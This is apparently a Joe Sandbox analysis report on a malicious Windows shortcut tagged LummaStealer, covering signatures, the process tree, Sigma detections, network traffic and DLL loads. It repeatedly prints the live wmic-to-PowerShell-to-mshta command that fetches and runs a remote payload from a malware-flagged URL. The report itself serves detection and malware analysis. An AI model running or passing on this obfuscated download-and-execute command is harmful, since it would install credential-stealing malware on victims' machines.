Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
h0UP1BcPk5.lnk

Overview

General Information

Sample name:h0UP1BcPk5.lnk
renamed because original name is a hash value
Original sample name:8aac762da1e4edaec3b7c4c891d9224c.lnk
Analysis ID:1570896
MD5:8aac762da1e4edaec3b7c4c891d9224c
SHA1:32599c47d458df430469756ad1773307e3df870a
SHA256:1e612ff0a9513a7407f349ee34eef01d81224507c6d31544f73cb45c22dcab71
Tags:lnkLummaStealeruser-abuse_ch
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Process Created Via Wmic.EXE
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 5004 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7152 cmdline: powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mshta.exe (PID: 5756 cmdline: "C:\Windows\System32\mshta.exe" https://nins.in/cembra/power/powersearch MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 5964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://nins.in/cembra/power/powersearch, CommandLine: "C:\Windows\System32\mshta.exe" https://nins.in/cembra/power/powersearch, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7152, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://nins.in/cembra/power/powersearch, ProcessId: 5756, ProcessName: mshta.exe
Sigma detected: Suspicious Process Created Via Wmic.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch", ProcessId: 5004, ProcessName: WMIC.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch, CommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 5004, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch, ProcessId: 7152, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5964, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://nins.in/cembra/power/powersearch...Avira URL Cloud: Label: malware
Source: https://nins.in/cembra/power/powersearchAvira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\powersearch[1]ReversingLabs: Detection: 21%
Multi AV Scanner detection for submitted file
Source: h0UP1BcPk5.lnkReversingLabs: Detection: 15%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.4% probability
Source: unknownHTTPS traffic detected: 216.10.240.70:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000005.00000002.3260581593.0000028C65BB8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260581593.0000028C65C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260581593.0000028C65C3C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260719411.0000028C65CDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3257942443.000002845F11A000.00000004.00000020.00020000.00000000.sdmp, powersearch[1].5.dr
Source: Binary string: sethc.pdb source: mshta.exe, 00000005.00000002.3260581593.0000028C65BB8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260581593.0000028C65C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260719411.0000028C65CDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3257942443.000002845F11A000.00000004.00000020.00020000.00000000.sdmp, powersearch[1].5.dr
Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /cembra/power/powersearch HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nins.inConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /cembra/power/powersearch HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nins.inConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: nins.in
Source: svchost.exe, 00000006.00000002.3259551817.000001AB5B000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.2101858618.000001AB5AE70000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: mshta.exe, 00000005.00000002.3257942443.000002845F0A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/
Source: mshta.exe, 00000005.00000002.3257942443.000002845F059000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3257942443.000002845F0EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260581593.0000028C65C16000.00000004.00000020.00020000.00000000.sdmp, h0UP1BcPk5.lnkString found in binary or memory: https://nins.in/cembra/power/powersearch
Source: powershell.exeString found in binary or memory: https://nins.in/cembra/power/powersearch$global:?
Source: mshta.exe, 00000005.00000002.3257942443.000002845F0A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearch%
Source: mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearch...
Source: mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearch...5
Source: mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearch...M
Source: mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearch...U
Source: mshta.exe, 00000005.00000002.3260581593.0000028C65BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearch0;
Source: mshta.exe, 00000005.00000002.3257942443.000002845F030000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3257942443.000002845F0EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchC:
Source: mshta.exe, 00000005.00000002.3257406405.000000F7AD332000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchG
Source: mshta.exe, 00000005.00000002.3257922633.000002845F020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchH
Source: mshta.exe, 00000005.00000002.3258533390.0000028C60E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchHu
Source: mshta.exe, 00000005.00000002.3257942443.000002845F059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchNK
Source: WMIC.exe, 00000000.00000003.2020914297.000002055E2C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchRelPath=
Source: mshta.exe, 00000005.00000002.3258242166.000002845F1E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchuserLOZOrc0
Source: mshta.exe, 00000005.00000002.3261480510.0000028C66005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchhttps://nins.in/cembra/power/powersearch
Source: mshta.exe, 00000005.00000002.3257942443.000002845F090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchk
Source: mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchmE
Source: WMIC.exe, 00000000.00000002.2022963351.000002055E3F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchogramFil
Source: mshta.exe, 00000005.00000002.3258533390.0000028C60E6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchon
Source: mshta.exe, 00000005.00000002.3257942443.000002845F059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/cembra/power/powersearchsRZ
Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 216.10.240.70:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

barindex
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000000.00000002.2022720506.000002055E280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch"C:\Users\user\Desktop\h0UP1BcPk5.lnkWinsta0\Default{memstr_de2461ae-b
Windows shortcut file (LNK) contains suspicious command line arguments
Source: h0UP1BcPk5.lnkLNK file: process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal96.evad.winLNK@7/13@3/2
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\powersearch[1]Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ftuk45i.cki.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: h0UP1BcPk5.lnkReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://nins.in/cembra/power/powersearch
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://nins.in/cembra/power/powersearchJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
